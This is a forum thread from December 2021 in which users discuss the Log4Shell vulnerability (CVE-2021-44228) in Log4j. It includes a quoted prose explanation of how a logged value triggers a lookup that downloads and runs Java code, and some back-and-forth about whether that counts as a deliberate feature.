Posted on 12/12/2021 9:08:33 PM PST by blueplum
The direct link to BGR:
https://bgr.com/tech/internet-is-scrambling-to-fix-log4shell-the-worst-hack-in-history/
MSN did not author this article.
What idiot thought it would be a good idea to have RCE capability in a logging utility?
It’s not normally there.
This is a vulnerability that makes that happen to the OS.
tech-ping
I’ve always hated JAVA.
>>It’s not normally there.
Wrong. That “feature” was deliberately coded.
From a different article on it:
The bug, now officially denoted CVE-2021-44228, involves sending a request to a vulnerable server in which you include some data – for example, an HTTP header – that you expect (or know) the server will write to its logfile.
But you booby-trap that data so that the server, while wrangling the data into a format suitable for logging, kicks off a web download as an integral part of constructing the needed log entry.
And not just any old download: if the data that comes back is a valid Java program (a .class file, in the jargon), then the server runs that file to “help” it generate the logging data.
The trick is that, by default, unpatched versions of the Log4j library permit logging requests to trigger general-purpose LDAP (directory services) searches, as well as various other online lookups.
You just proved it's not performing remote code execution. There's nothing in Log4j that lets you run any code. It does a lookup, but that is not executed code or arbitrary code.
>>There’s nothing in Log4j that lets you run any code.
Did you miss THIS?
“And not just any old download: if the data that comes back is a valid Java program (a .class file, in the jargon), then the server runs that file to “help” it generate the logging data.”
Downloading and running arbitrary code seems like a bad idea.
Again, log4j does not ever run such code. It does now, only under an exploit.
Ummmmm... that’s what the entire panic is over. A security flaw means that Log4J will retrieve client-supplied URLs including executing Java code. That’s not good.
its a wonderful world
https://www.reuters.com/markets/europe/exclusive-imf-10-countries-simulate-cyber-attack-global-financial-system-2021-12-09/?fbclid=IwAR3fiRQ05BTXjvfc5N_hFlNh0yhH5PbmIe8zCzsfzLMw6L6cKZXUrr6prI0
No.
Thnx for providing such a clear explanation for a semi-techie like me!
I was thinking the same thing. What purpose could it serve?
It’s been impossible here to create new ebay listings via desktop since Friday (apparently ok via mobile apps), wonder if there could be a connection?
bookmark
No.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.